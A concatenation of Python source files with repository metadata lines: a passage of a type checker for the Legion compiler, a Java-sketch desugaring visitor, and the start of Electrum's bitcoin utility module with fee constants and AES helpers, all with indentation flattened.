cx = cx.new_block_scope()
for expr in node.block:
type_check_node(expr, cx)
return types.Void()
@type_check_node.register(ast.StatementAssert)
def _(node, cx):
expr_type = type_check_node(node.expr, cx).check_read(node.expr, cx)
if not types.is_bool(expr_type):
raise types.TypeError(node, 'Type mismatch in assert statement: expected %s but got %s' % (
types.Bool(), expr_type))
return types.Void()
@type_check_node.register(ast.StatementExpr)
def _(node, cx):
type_check_node(node.expr, cx).check_read(node.expr, cx)
return types.Void()
@type_check_node.register(ast.StatementIf)
def _(node, cx):
condition_type = type_check_node(node.condition, cx).check_read(node.condition, cx)
type_check_node(node.then_block, cx)
if node.else_block is not None:
type_check_node(node.else_block, cx)
if not types.is_bool(condition_type):
raise types.TypeError(node, 'If condition expression is not type bool')
return types.Void()
@type_check_node.register(ast.StatementFor)
def _(node, cx):
cx = cx.new_block_scope()
index_types = type_check_node(node.indices, cx)
region_types = type_check_node(node.regions, cx)
if len(index_types) != len(region_types):
raise types.TypeError(node, 'Incorrect number of indices in for statement: expected %s but got %s' % (
len(region_types), len(index_types)))
# Two forms of iteration are supported, over a single index
# space, or over any number of regions. In the case where
# multiple regions are being iterated, it is assumed the
# regions have the same index space. At the moment this has to
# be checked dynamically to be sound.
if len(region_types) == 1 and types.is_ispace(region_types[0]):
index_node = node.indices.indices[0]
index_type = index_types[0]
ispace_type = region_types[0]
# We can infer the index type if unspecified.
if index_type is None:
index_type = ispace_type.kind.index_type
if index_type != ispace_type.kind.index_type:
raise types.TypeError(node, 'Type mismatch in for statement: expected %s but got %s' % (
index_type, ispace_type.kind.index_type))
# Patch environment and type map to know about the inferred index type.
cx.insert(node, index_node.name, index_type)
cx.type_map[index_node] = index_type
else:
for index_node, index_type, region_type, index \
in zip(node.indices.indices, index_types, region_types, xrange(len(index_types))):
if not types.is_region(region_type):
raise types.TypeError(node, 'Type mismatch on index %s of for statement: expected a region but got %s' % (
index, region_type))
# We can infer the index type as long as the region is explicitly typed.
if index_type is None:
if region_type.kind.contains_type is None:
raise types.TypeError(node, 'Unable to infer type of index %s of for statement: region %s has no element type' % (
index, region_type))
index_type = types.Pointer(region_type.kind.contains_type, [region_type])
if not types.is_pointer(index_type):
raise types.TypeError(node, 'Type mismatch on index %s of for statement: expected a pointer but got %s' % (
index, index_type))
if len(index_type.regions) != 1 or index_type.regions[0] != region_type:
raise types.TypeError(node, 'Type mismatch on index %s of for statement: expected %s but got %s' % (
index, index_type,
types.Pointer(region_type.kind.contains_type, [region_type])))
# Patch environment and type map to know about the inferred index type.
cx.insert(node, index_node.name, index_type)
cx.type_map[index_node] = index_type
type_check_node(node.block, cx)
return types.Void()
@type_check_node.register(ast.ForIndices)
def _(node, cx):
return [type_check_node(index, cx)
for index in node.indices]
@type_check_node.register(ast.ForIndex)
def _(node, cx):
if node.type is not None:
declared_kind = type_check_node(node.type, cx)
assert types.is_kind(declared_kind)
return declared_kind.type
return None
@type_check_node.register(ast.ForRegions)
def _(node, cx):
return [type_check_node(region, cx)
for region in node.regions]
@type_check_node.register(ast.ForRegion)
def _(node, cx):
region_type = cx.lookup(node, node.name)
return region_type
@type_check_node.register(ast.StatementLet)
def _(node, cx):
declared_type = None
if node.type is not None:
declared_kind = type_check_node(node.type, cx)
if types.is_region_kind(declared_kind):
declared_type = types.Region(node.name, declared_kind)
cx.region_forest.add(declared_type)
if types.is_kind(declared_kind):
declared_type = declared_kind.type
else:
assert False
expr_type = type_check_node(node.expr, cx).check_read(node.expr, cx)
# Hack: Rather full type inference, which gets ugly fast, just
# implement "auto-style" inference by using the expression
# type if no type declaration is provided.
if declared_type is None:
if types.is_region(expr_type):
declared_type = types.Region(node.name, expr_type.kind)
cx.region_forest.add(declared_type)
else:
declared_type = expr_type
if not types.is_concrete(declared_type):
raise types.TypeError(node, 'Let bound expressions are not allowed to contain wildcards')
if types.is_void(declared_type):
raise types.TypeError(node, 'Let bound expressions are not allowed to be void')
if types.is_region(expr_type) and types.is_region(declared_type):
if expr_type.kind != declared_type.kind:
raise types.TypeError(node, 'Let bound expression of type %s does not match declared type %s' % (
expr_type.kind, declared_type.kind))
else:
if expr_type != declared_type:
raise types.TypeError(node, 'Let bound expression of type %s does not match declared type %s' % (
expr_type, declared_type))
cx.insert(node, node.name, declared_type, shadow = True)
if types.is_region(expr_type):
cx.region_forest.union(declared_type, expr_type)
cx.constraints.add(
types.Constraint(lhs = expr_type, op = types.Constraint.SUBREGION, rhs = declared_type))
cx.constraints.add(
types.Constraint(lhs = declared_type, op = types.Constraint.SUBREGION, rhs = expr_type))
return declared_type
@type_check_node.register(ast.StatementLetRegion)
def _(node, cx):
region_type = types.Region(node.name, types.RegionKind(None, None))
cx.region_forest.add(region_type)
# Insert region name into scope so that element type can refer to it.
cx.insert(node, node.name, region_type)
declared_region_kind = None
if node.region_kind is not None:
declared_region_kind = type_check_node(node.region_kind, cx)
element_kind = type_check_node(node.element_type, cx)
size_type = type_check_node(node.size_expr, cx).check_read(node.size_expr, cx)
assert types.is_kind(element_kind) and not types.is_void(element_kind.type)
if not types.is_int(size_type):
raise types.TypeError(node, 'Type mismatch in region: expected %s but got %s' % (
types.Int(), size_type))
# Now patch region type so that it refers to the contained type.
region_kind = types.RegionKind(None, element_kind.type)
region_type.kind = region_kind
if not region_type.validate_regions():
raise types.TypeError(node, 'Region type is inconsistent with itself: %s' % region_type.pretty_kind())
if declared_region_kind is None:
declared_region_kind = region_kind
if declared_region_kind != region_kind:
raise types.TypeError(node, 'Let bound expression of type %s does not match declared type %s' % (
region_kind, declared_region_kind))
cx.privileges.add(types.Privilege(node, types.Privilege.READ, None, region_type, ()))
cx.privileges.add(types.Privilege(node, types.Privilege.WRITE, None, region_type, ()))
return region_type
@type_check_node.register(ast.StatementLetArray)
def _(node, cx):
ispace_type = type_check_node(node.ispace_type, cx)
region_type = types.Region(node.name, types.RegionKind(ispace_type, None))
cx.region_forest.add(region_type)
# insert region name into scope so that element type can refer to it
cx.insert(node, node.name, region_type)
declared_region_kind = None
if node.region_kind is not None:
declared_region_kind = type_check_node(node.region_kind, cx)
element_kind = type_check_node(node.element_type, cx)
assert types.is_kind(element_kind) and not types.is_void(element_kind.type)
# now patch region type so that it refers to the contained type
region_kind = types.RegionKind(ispace_type, element_kind.type)
region_type.kind = region_kind
if declared_region_kind is None:
declared_region_kind = region_kind
if declared_region_kind != region_kind:
raise types.TypeError(node, 'Let bound expression of type %s does not match declared type %s' % (
region_kind, declared_region_kind))
cx.privileges.add(types.Privilege(node, types.Privilege.READ, None, region_type, ()))
cx.privileges.add(types.Privilege(node, types.Privilege.WRITE, None, region_type, ()))
return region_type
@type_check_node.register(ast.StatementLetIspace)
def _(node, cx):
declared_ispace_kind = None
if node.ispace_kind is not None:
declared_ispace_kind = type_check_node(node.ispace_kind, cx)
index_kind = type_check_node(node.index_type, cx)
size_type = type_check_node(node.size_expr, cx).check_read(node.size_expr, cx)
assert types.is_kind(index_kind) and types.is_int(index_kind.type)
if not types.is_int(size_type):
raise types.TypeError(node, 'Type mismatch in ispace: expected %s but got %s' % (
types.Int(), size_type))
ispace_kind = types.IspaceKind(index_kind.type)
if declared_ispace_kind is None:
declared_ispace_kind = ispace_kind
if declared_ispace_kind != ispace_kind:
raise types.TypeError(node, 'Let bound expression of type %s does not match declared type %s' % (
ispace_kind, declared_ispace_kind))
ispace_type = types.Ispace(node.name, ispace_kind)
cx.insert(node, node.name, ispace_type)
return types.Void()
@type_check_node.register(ast.StatementLetPartition)
def _(node, cx):
region_type = type_check_node(node.region_type, cx).check_read(node.region_type, cx)
mode = type_check_node(node.mode, cx)
coloring_type = type_check_node(node.coloring_expr, cx).check_read(node.coloring_expr, cx)
if not (types.is_region(region_type) or types.is_ispace(region_type)):
raise types.TypeError(node, 'Type mismatch in partition: expected a region or ispace but got %s' % (
region_type))
expected_coloring_type = types.Coloring(region_type)
if coloring_type != expected_coloring_type:
raise types.TypeError(node, 'Type mismatch in partition: expected %s but got %s' % (
expected_coloring_type, coloring_type))
partition_kind = types.PartitionKind(region_type, mode)
partition_type = types.Partition(node.name, partition_kind)
cx.insert(node, node.name, partition_type)
return partition_type
@type_check_node.register(ast.PartitionMode)
def _(node, cx):
if node.mode == 'disjoint':
return types.Partition.DISJOINT
elif node.mode == 'aliased':
return types.Partition.ALIASED
assert False
@type_check_node.register(ast.StatementReturn)
def _(node, cx):
expr_type = type_check_node(node.expr, cx).check_read(node.expr, cx)
if expr_type != cx.return_type:
raise types.TypeError(node, 'Returned expression of type %s does not match declared return type %s' % (
expr_type, cx.return_type))
return types.Void()
@type_check_node.register(ast.StatementUnpack)
def _(node, cx):
expr_type = type_check_node(node.expr, cx).check_read(node.expr, cx)
declared_kind = type_check_node(node.type, cx)
assert types.is_kind(declared_kind)
declared_type = declared_kind.type
if not types.is_struct(expr_type):
raise types.TypeError(node, 'Type mismatch in unpack: expected %s but got %s' % (
'a struct', expr_type))
region_types = type_check_node(node.regions, cx)
for region, region_type in zip(node.regions.regions, region_types):
cx.insert(node, region.name, region_type) # FIXME: handle shadowing
region_map = dict(zip(declared_type.regions, region_types))
actual_type = declared_type.instantiate_regions(region_map)
# Patch regions so that they contain the correct type.
for region_type, declared_region_type in zip(region_types, declared_type.regions):
region_type.kind = declared_region_type.kind.substitute_regions(region_map)
if expr_type != declared_type:
raise types.TypeError(node, 'Type mismatch in unpack: expected %s but got %s' % (
declared_type, expr_type))
cx.insert(node, node.name, actual_type) # FIXME: handle shadowing
cx.constraints.update(actual_type.constraints)
return region_types
@type_check_node.register(ast.UnpackRegions)
def _(node, cx):
return [type_check_node(region, cx) for region in node.regions]
@type_check_node.register(ast.UnpackRegion)
def _(node, cx):
# Create regions with empty region_types initially, patch later.
region_type = types.Region(node.name, types.RegionKind(None, None))
cx.region_forest.add(region_type)
return region_type
@type_check_node.register(ast.StatementVar)
def _(node, cx):
declared_type = None
if node.type is not None:
declared_kind = type_check_node(node.type, cx)
assert types.is_kind(declared_kind)
declared_type = declared_kind.type
expr_type = type_check_node(node.expr, cx).check_read(node.expr, cx)
# Hack: Rather full type inference, which gets ugly fast, just
# implement "auto-style" inference by using the expression
# type if no type declaration is provided.
if declared_type is None:
declared_type = expr_type
if not types.is_concrete(declared_type):
raise types.TypeError(node, 'Variables are not allowed to contain wildcards')
if expr_type != declared_type:
raise types.TypeError(node, 'Variable initializer of type %s does not match declared type %s' % (
expr_type, declared_type))
assert types.allows_var_binding(declared_type)
reference_type = types.StackReference(declared_type)
cx.insert(node, node.name, reference_type, shadow = True)
return types.Void()
@type_check_node.register(ast.StatementWhile)
def _(node, cx):
condition_type = type_check_node(node.condition, cx).check_read(node.condition, cx)
type_check_node(node.block, cx)
if not types.is_bool(condition_type):
raise types.TypeError(node, 'While condition expression is not type bool')
return types.Void()
@type_check_node.register(ast.ExprID)
def _(node, cx):
id_type = cx.lookup(node, node.name)
return id_type
@type_check_node.register(ast.ExprAssignment)
def _(node, cx):
lval_type = type_check_node(node.lval, cx).check_write(node.lval, cx)
rval_type = type_check_node(node.rval, cx).check_read(node.rval, cx)
if lval_type != rval_type:
raise types.TypeError(node, 'Type mismatch in assignment: %s and %s' % (
lval_type, rval_type))
return rval_type
@type_check_node.register(ast.ExprUnaryOp)
def _(node, cx):
arg_type = type_check_node(node.arg, cx).check_read(node.arg, cx)
if not unary_operator_table[node.op][0](arg_type):
raise types.TypeError(node, 'Type mismatch in operand to unary operator: %s' % (
arg_type))
return unary_operator_table[node.op][1](arg_type)
@type_check_node.register(ast.ExprBinaryOp)
def _(node, cx):
lhs_type = type_check_node(node.lhs, cx).check_read(node.lhs, cx)
rhs_type = type_check_node(node.rhs, cx).check_read(node.rhs, cx)
if lhs_type != rhs_type:
raise types.TypeError(node, 'Type mismatch in operands to binary operator: %s and %s' % (
lhs_type, rhs_type))
if not binary_operator_table[node.op][0](lhs_type):
raise types.TypeError(node, 'Type mismatch in operand to binary operator: %s' % (
lhs_type))
if not binary_operator_table[node.op][0](rhs_type):
raise types.TypeError(node, 'Type mismatch in operand to binary operator: %s' % (
rhs_type))
return binary_operator_table[node.op][1](lhs_type, rhs_type)
@type_check_node.register(ast.ExprReduceOp)
def _(node, cx):
lhs_type = type_check_node(node.lhs, cx).check_reduce(node.lhs, node.op, cx)
rhs_type = type_check_node(node.rhs, cx).check_read(node.rhs, cx)
if lhs_type != rhs_type:
raise types.TypeError(node, 'Type mismatch in operands to binary operator: %s and %s' % (
lhs_type, rhs_type))
if not reduce_operator_table[node.op](lhs_type):
raise types.TypeError(node, 'Type mismatch in operand to binary operator: %s' % (
lhs_type))
if not reduce_operator_table[node.op](rhs_type):
raise types.TypeError(node, 'Type mismatch in operand to binary operator: %s' % (
rhs_type))
return types.Void()
@type_check_node.register(ast.ExprCast)
def _(node, cx):
cast_to_kind = type_check_node(node.cast_to_type, cx)
assert types.is_kind(cast_to_kind) and types.is_numeric(cast_to_kind.type)
expr_type = type_check_node(node.expr, cx).check_read(node.expr, cx)
if not types.is_numeric(expr_type):
raise types.TypeError(node, 'Type mismatch in cast: expected a number but got %s' % (
expr_type))
return cast_to_kind.type
@type_check_node.register(ast.ExprNull)
def _(node, cx):
pointer_kind = type_check_node(node.pointer_type, cx)
assert types.is_kind(pointer_kind) and types.is_pointer(pointer_kind.type)
return pointer_kind.type
@type_check_node.register(ast.ExprIsnull)
def _(node, cx):
pointer_type = type_check_node(node.pointer_expr, cx).check_read(node.pointer_expr, cx)
if not types.is_pointer(pointer_type):
raise types.TypeError(node, 'Type mismatch for argument %s in call to task %s: expected %s but got %s' % (
0, 'isnull', 'a pointer', pointer_type))
return types.Bool()
@type_check_node.register(ast.ExprNew)
def _(node, cx):
pointer_kind = type_check_node(node.pointer_type, cx)
assert types.is_kind(pointer_kind) and types.is_pointer(pointer_kind.type)
pointer_type = pointer_kind.type
if len(pointer_type.regions) != 1:
raise types.TypeError(node, 'Type mismatch in new: cannot allocate pointer with more than one region %s' % (
pointer_type))
region_type = pointer_type.regions[0]
if region_type.kind.ispace is not None:
raise types.TypeError(node, 'Type mismatch in new: cannot allocate into array %s' %
region_type)
return pointer_type
@type_check_node.register(ast.ExprRead)
def _(node, cx):
pointer_type = type_check_node(node.pointer_expr, cx).check_read(node.pointer_expr, cx)
if not types.is_pointer(pointer_type):
raise types.TypeError(node, 'Type mismatch in read: expected a pointer but got %s' % (
pointer_type))
privileges_requested = [
types.Privilege(node, types.Privilege.READ, None, region, ())
for region in pointer_type.regions]
success, failed_request = types.check_privileges(privileges_requested, cx)
if not success:
raise types.TypeError(node, 'Invalid privilege %s requested in read' % failed_request)
value_type = pointer_type.points_to_type
return value_type
@type_check_node.register(ast.ExprWrite)
def _(node, cx):
pointer_type = type_check_node(node.pointer_expr, cx).check_read(node.pointer_expr, cx)
value_type = type_check_node(node.value_expr, cx).check_read(node.value_expr, cx)
if not types.is_pointer(pointer_type):
raise types.TypeError(node, 'Type mismatch in write: expected a pointer but got %s' % (
pointer_type))
if pointer_type.points_to_type != value_type:
raise types.TypeError(node, 'Type mismatch in write: expected %s but got %s' % (
value_type, pointer_type.points_to_type))
privileges_requested = [
types.Privilege(node, types.Privilege.WRITE, None, region, ())
for region in pointer_type.regions]
success, failed_request = types.check_privileges(privileges_requested, cx)
if not success:
raise types.TypeError(node, 'Invalid privilege %s requested in write' % failed_request)
return types.Void()
@type_check_node.register(ast.ExprReduce)
def _(node, cx):
pointer_type = type_check_node(node.pointer_expr, cx).check_read(node.pointer_expr, cx)
value_type = type_check_node(node.value_expr, cx).check_read(node.value_expr, cx)
if not types.is_pointer(pointer_type):
raise types.TypeError(node, 'Type mismatch in reduce: expected a pointer but got %s' % (
pointer_type))
if pointer_type.points_to_type != value_type:
raise types.TypeError(node, 'Type mismatch in reduce: %s and %s' % (
pointer_type.points_to_type, value_type))
if not reduce_operator_table[node.op](pointer_type.points_to_type):
raise types.TypeError(node, 'Type mismatch in reduce: %s' % (
pointer_type.points_to_type))
if not reduce_operator_table[node.op](value_type):
raise types.TypeError(node, 'Type mismatch in reduce: %s' % (
value_type))
privileges_requested = [
types.Privilege(node, types.Privilege.REDUCE, node.op, region, ())
for region in pointer_type.regions]
success, failed_request = types.check_privileges(privileges_requested, cx)
if not success:
raise types.TypeError(node, 'Invalid privilege %s requested in reduce' % failed_request)
return types.Void()
@type_check_node.register(ast.ExprDereference)
def _(node, cx):
pointer_type = type_check_node(node.pointer_expr, cx).check_read(node.pointer_expr, cx)
if not types.is_pointer(pointer_type):
raise types.TypeError(node, 'Type mismatch in pointer dereference: expected a pointer but got %s' % (
pointer_type))
reference_type = types.Reference(
refers_to_type = pointer_type.points_to_type,
regions = pointer_type.regions)
return reference_type
@type_check_node.register(ast.ExprArrayAccess)
def _(node, cx):
array_type = type_check_node(node.array_expr, cx).check_read(node.array_expr, cx)
index_type = type_check_node(node.index_expr, cx).check_read(node.index_expr, cx)
# Handle partitions:
if types.is_partition(array_type):
if not types.is_int(index_type):
raise types.TypeError(node, 'Type mismatch in index for partition access: expected %s but got %s' % (
types.Int(),
index_type))
# Check whether the index expression is a compile-time
# constant value. Add disjointness constraints for the
# subregion if and only if the the index is constant.
if isinstance(node.index_expr, ast.ExprConstInt):
index = node.index_expr.value
subregion_type = array_type.static_subregion(index, cx)
else:
index_expr = node.index_expr
subregion_type = array_type.dynamic_subregion(index_expr, cx)
return subregion_type
# Handle array slicing:
if types.is_region(array_type) and types.is_ispace(index_type):
if array_type.kind.ispace is None:
raise types.TypeError(node, 'Type mismatch in array slice: expected an array but got %s' % (
array_type))
# Check constraints for the index space to make sure it is
# a subset of the index space of the array.
success, failed_request = types.check_constraints(
[types.Constraint(lhs = index_type, op = types.Constraint.SUBREGION, rhs = array_type.kind.ispace)],
cx.constraints)
if not success:
raise types.TypeError(node, 'Invalid constraint %s requested in array slice' % (
'%s <= %s' % (index_type, array_type.kind.ispace)))
array_kind = types.RegionKind(index_type, array_type.kind.contains_type)
subarray_type = types.Region('%s[%s]' % (array_type, index_type), array_kind)
cx.region_forest.union(subarray_type, array_type)
return subarray_type
# Handle arrays:
if not types.is_region(array_type):
raise types.TypeError(node, 'Type mismatch in array access: expected an array but got %s' % (
array_type))
ispace = array_type.kind.ispace
if ispace is None:
raise types.TypeError(node, 'Type mismatch in array access: expected an array but got %s' % (
array_type.kind))
if ispace.kind.index_type != index_type:
raise types.TypeError(node, 'Type mismatch in index for array access: expected %s but got %s' % (
ispace.kind.index_type,
index_type))
reference_type = types.Reference(
refers_to_type = array_type.kind.contains_type,
regions = [array_type])
return reference_type
@type_check_node.register(ast.ExprFieldAccess)
def _(node, cx):
wrapper_type = type_check_node(node.struct_expr, cx)
struct_type = wrapper_type.as_read()
if not types.is_struct(struct_type):
raise types.TypeError(node, 'Type mismatch in struct field access: expected a struct but got %s' % (
struct_type))
if node.field_name not in struct_type.field_map:
raise types.TypeError(node, 'Struct %s has no field named %s' % (
struct_type, node.field_name))
return wrapper_type.get_field(node.field_name)
@type_check_node.register(ast.ExprFieldDereference)
def _(node, cx):
pointer_type = type_check_node(node.pointer_expr, cx).check_read(node.pointer_expr, cx)
if not types.is_pointer(pointer_type):
raise types.TypeError(node, 'Type mismatch in struct field dereference: expected a pointer to a struct but got %s' % (
pointer_type))
if not types.is_struct(pointer_type.points_to_type):
raise types.TypeError(node, 'Type mismatch in struct field dereference: expected a pointer to a struct but got %s' % (
pointer_type))
if node.field_name not in pointer_type.points_to_type.field_map:
raise types.TypeError(node, 'Struct %s has no field named %s' % (
pointer_type.points_to_type, node.field_name))
return types.Reference(pointer_type.points_to_type, pointer_type.regions).get_field(node.field_name)
@type_check_node.register(ast.ExprFieldValues)
def _(node, cx):
field_values = type_check_node(node.field_values, cx)
field_map = OrderedDict()
for field_name, value_type in field_values:
field_map[field_name] = value_type
struct_type = types.Struct(None, [], [], set(), field_map)
return struct_type
@type_check_node.register(ast.FieldValues)
def _(node, cx):
return [type_check_node(field_value, cx)
for field_value in node.field_values]
@type_check_node.register(ast.FieldValue)
def _(node, cx):
return (
node.field_name,
type_check_node(node.value_expr, cx).check_read(node.value_expr, cx))
@type_check_node.register(ast.ExprFieldUpdates)
def _(node, cx):
struct_type = type_check_node(node.struct_expr, cx).check_read(node.struct_expr, cx)
field_updates = type_check_node(node.field_updates, cx)
if not types.is_struct(struct_type):
raise types.TypeError(node, 'Type mismatch in struct field updates: expected a struct but got %s' % (
struct_type))
all_fields_match = True
for field_name, update_type in field_updates:
assert field_name in struct_type.field_map
if update_type != struct_type.field_map[field_name]:
all_fields_match = False
if all_fields_match:
new_struct_type = struct_type
else:
new_field_map = struct_type.field_map.copy()
for field_name, update_type in field_updates:
new_field_map[field_name] = update_type
new_struct_type = types.Struct(None, [], [], set(), new_field_map)
return new_struct_type
@type_check_node.register(ast.FieldUpdates)
def _(node, cx):
return [type_check_node(field_update, cx)
for field_update in node.field_updates]
@type_check_node.register(ast.FieldUpdate)
def _(node, cx):
return (
node.field_name,
type_check_node(node.update_expr, cx).check_read(node.update_expr, cx))
@type_check_node.register(ast.ExprColoring)
def _(node, cx):
region_type = type_check_node(node.region, cx).check_read(node.region, cx)
if not (types.is_region(region_type) or types.is_ispace(region_type)):
raise types.TypeError(node, 'Type mismatch in coloring: expected a region or ispace but got %s' % (
region_type))
return types.Coloring(region_type)
@type_check_node.register(ast.ColoringRegion)
def _(node, cx):
return cx.lookup(node, node.name)
@type_check_node.register(ast.ExprColor)
def _(node, cx):
coloring_type = type_check_node(node.coloring_expr, cx).check_read(node.coloring_expr, cx)
pointer_type = type_check_node(node.pointer_expr, cx).check_read(node.pointer_expr, cx)
color_type = type_check_node(node.color_expr, cx).check_read(node.color_expr, cx)
if not types.is_coloring(coloring_type):
raise types.TypeError(node, 'Type mismatch for argument %s in call to task %s: expected %s but got %s' % (
0, 'color', 'a coloring', coloring_type))
if types.is_region(coloring_type.region):
expected_pointer_type = types.Pointer(
coloring_type.region.kind.contains_type,
[coloring_type.region])
elif types.is_ispace(coloring_type.region):
expected_pointer_type = coloring_type.region.kind.index_type
else:
assert False
if pointer_type != expected_pointer_type:
raise types.TypeError(node, 'Type mismatch for argument %s in call to task %s: expected %s but got %s' % (
1, 'color', expected_pointer_type, pointer_type))
if not types.is_int(color_type):
raise types.TypeError(node, 'Type mismatch for argument %s in call to task %s: expected %s but got %s' % (
2, 'color', types.Int(), color_type))
return coloring_type
@type_check_node.register(ast.ExprUpregion)
def _(node, cx):
region_types = type_check_node(node.regions, cx)
expr_type = type_check_node(node.expr, cx).check_read(node.expr, cx)
for index, region_type in zip(xrange(len(region_types)), region_types):
if not types.is_region(region_type):
raise types.TypeError(node, 'Type mismatch for type argument %s in call to task %s: expected %s but got %s' % (
index, 'upregion', 'a region', region_type))
if not types.is_pointer(expr_type):
raise types.TypeError(node, 'Type mismatch for argument %s in call to task %s: expected %s but got %s' % (
index, 'upregion', 'a pointer', expr_type))
for expr_region in expr_type.regions:
subregion = False
for region_type in region_types:
success, failed_request = types.check_constraints(
[types.Constraint(lhs = expr_region, op = types.Constraint.SUBREGION, rhs = region_type)],
cx.constraints)
if success:
subregion = True
break
if not subregion:
raise types.TypeError(node, 'Invalid constraint %s requested in upregion expression' % (
'%s <= %s' % (expr_region, region_type)))
return types.Pointer(expr_type.points_to_type, region_types)
@type_check_node.register(ast.UpregionRegions)
def _(node, cx):
return [type_check_node(region, cx).check_read(region, cx)
for region in node.regions]
@type_check_node.register(ast.UpregionRegion)
def _(node, cx):
return cx.lookup(node, node.name)
@type_check_node.register(ast.ExprDownregion)
def _(node, cx):
region_types = type_check_node(node.regions, cx)
expr_type = type_check_node(node.expr, cx).check_read(node.expr, cx)
for index, region_type in zip(xrange(len(region_types)), region_types):
if not types.is_region(region_type):
raise types.TypeError(node, 'Type mismatch for type argument %s in call to task %s: expected %s but got %s' % (
index, 'downregion', 'a region', region_type))
if not types.is_pointer(expr_type):
raise types.TypeError(node, 'Type mismatch for argument %s in call to task %s: expected %s but got %s' % (
index, 'downregion', 'a pointer', expr_type))
return types.Pointer(expr_type.points_to_type, region_types)
@type_check_node.register(ast.DownregionRegions)
def _(node, cx):
return [type_check_node(region, cx).check_read(region, cx)
for region in node.regions]
@type_check_node.register(ast.DownregionRegion)
def _(node, cx):
return cx.lookup(node, node.name)
@type_check_node.register(ast.ExprPack)
def _(node, cx):
declared_kind = type_check_node(node.type, cx)
assert types.is_kind(declared_kind)
declared_type = declared_kind.type
region_types = type_check_node(node.regions, cx)
actual_type = declared_type.instantiate_regions(dict(zip(declared_type.regions, region_types)))
expr_type = type_check_node(node.expr, cx).check_read(node.expr, cx)
if expr_type != actual_type:
raise types.TypeError(node, 'Type mismatch in pack: expected %s but got %s' % (
actual_type, expr_type))
success, failed_request = types.check_constraints(actual_type.constraints, cx.constraints)
if not success:
raise types.TypeError(node, 'Invalid constraint %s requested in pack expression' % (
failed_request))
return declared_type
@type_check_node.register(ast.PackRegions)
def _(node, cx):
return [type_check_node(region, cx) for region in node.regions]
@type_check_node.register(ast.PackRegion)
def _(node, cx):
region_type = cx.lookup(node, node.name)
assert types.is_region(region_type)
return region_type
@type_check_node.register(ast.ExprCall)
def _(node, cx):
fn_type = type_check_node(node.function, cx).check_read(node.function, cx)
assert types.is_function(fn_type)
function_name = node.function.name
arg_types = type_check_node(node.args, cx)
region_map = dict(
[(param, arg)
for param, arg in zip(fn_type.param_types, arg_types)
if (types.is_region(param) and types.is_region(arg))
or (types.is_ispace(param) and types.is_ispace(arg))])
param_types = [t.substitute_regions(region_map) for t in fn_type.param_types]
privileges_requested = [t.substitute_regions(region_map) for t in fn_type.privileges]
return_type = fn_type.return_type.substitute_regions(region_map)
if len(param_types) != len(arg_types):
raise types.TypeError(node, 'Incorrect number of arguments for call to task %s: expected %s but got %s' % (
function_name, len(param_types), len(arg_types)))
for param_type, arg_type, index in zip(param_types, arg_types, xrange(len(param_types))):
if types.is_ispace(param_type):
if not types.is_ispace(arg_type) or param_type.kind != arg_type.kind:
raise types.TypeError(node, 'Type mismatch for argument %s in call to task %s: expected %s but got %s' % (
index, function_name, param_type.kind, arg_type))
elif types.is_region(param_type):
# First check that both are regions.
if not types.is_region(arg_type):
raise types.TypeError(node, 'Type mismatch for argument %s in call to task %s: expected %s but got %s' % (
index, function_name, param_type.kind, arg_type))
# Then check that the regions contains compatible types.
param_kind = param_type.kind.substitute_regions(region_map)
arg_kind = arg_type.kind
if param_kind != arg_kind:
raise types.TypeError(node, 'Type mismatch for argument %s in call to task %s: expected %s but got %s' % (
index, function_name, param_kind, arg_kind))
elif param_type != arg_type:
raise types.TypeError(node, 'Type mismatch for argument %s in call to task %s: expected %s but got %s' % (
index, function_name, param_type, arg_type))
success, failed_request = types.check_privileges(privileges_requested, cx)
if not success:
raise types.TypeError(node, 'Invalid privilege %s requested in call to task %s' % (
failed_request, function_name))
return return_type
@type_check_node.register(ast.Args)
def _(node, cx):
return [type_check_node(arg, cx).check_read(arg, cx)
for arg in node.args]
@type_check_node.register(ast.ExprConstBool)
def _(node, cx):
return types.Bool()
@type_check_node.register(ast.ExprConstDouble)
def _(node, cx):
return types.Double()
@type_check_node.register(ast.ExprConstFloat)
def _(node, cx):
return types.Float()
@type_check_node.register(ast.ExprConstInt)
def _(node, cx):
return types.Int()
@type_check_node.register(ast.ExprConstUInt)
def _(node, cx):
return types.UInt()
def type_check(program, opts):
cx = types.Context(opts)
type_check_node(program, cx)
return cx.type_map, cx.constraints, cx.foreign_types
|
SKA-ScienceDataProcessor/legion-sdp-clone
|
deprecated/compiler/lib/lcomp/type_check.py
|
Python
|
apache-2.0
| 56,247
|
# import logging
from ast.visit import visit as v
from ast.node import Node
from ast.body.methoddeclaration import MethodDeclaration
from ast.stmt.minrepeatstmt import MinrepeatStmt
class Desugar(object):
def __init__(self):
self._cur_mtd = None
@v.on("node")
def visit(self, node):
"""
This is the generic method to initialize the dynamic dispatcher
"""
@v.when(Node)
def visit(self, node):
for c in node.childrenNodes: c.accept(self)
@v.when(MethodDeclaration)
def visit(self, node):
self._cur_mtd = node
for c in node.childrenNodes: c.accept(self)
@v.when(MinrepeatStmt)
def visit(self, node):
raise NotImplementedError
# Old impl
# @v.when(Statement)
# def visit(self, node):
# if node.kind == C.S.MINREPEAT:
# b = '\n'.join(map(str, node.b))
# body = u""
# for i in xrange(9): # TODO: parameterize
# body += u"""
# if (??) {{ {} }}
# """.format(b)
# logging.debug(
# "desugaring minrepeat @ {}".format(self._cur_mtd.name))
# return to_statements(self._cur_mtd, body)
# return [node]
|
plum-umd/java-sketch
|
java_sk/rewrite/desugar.py
|
Python
|
mit
| 1,242
|
# -*- coding: utf-8 -*-
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 thomasv@gitorious
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import hashlib
import base64
import re
import sys
import hmac
import version
from util import print_error
try:
import ecdsa
except ImportError:
sys.exit("Error: python-ecdsa does not seem to be installed. Try 'sudo pip install ecdsa'")
try:
import aes
except ImportError:
sys.exit("Error: AES does not seem to be installed. Try 'sudo pip install slowaes'")
################################## transactions
DUST_THRESHOLD = 0
DUST_SOFT_LIMIT = 100000
MIN_RELAY_TX_FEE = 100000
RECOMMENDED_FEE = 100000
COINBASE_MATURITY = 100
# AES encryption
EncodeAES = lambda secret, s: base64.b64encode(aes.encryptData(secret,s))
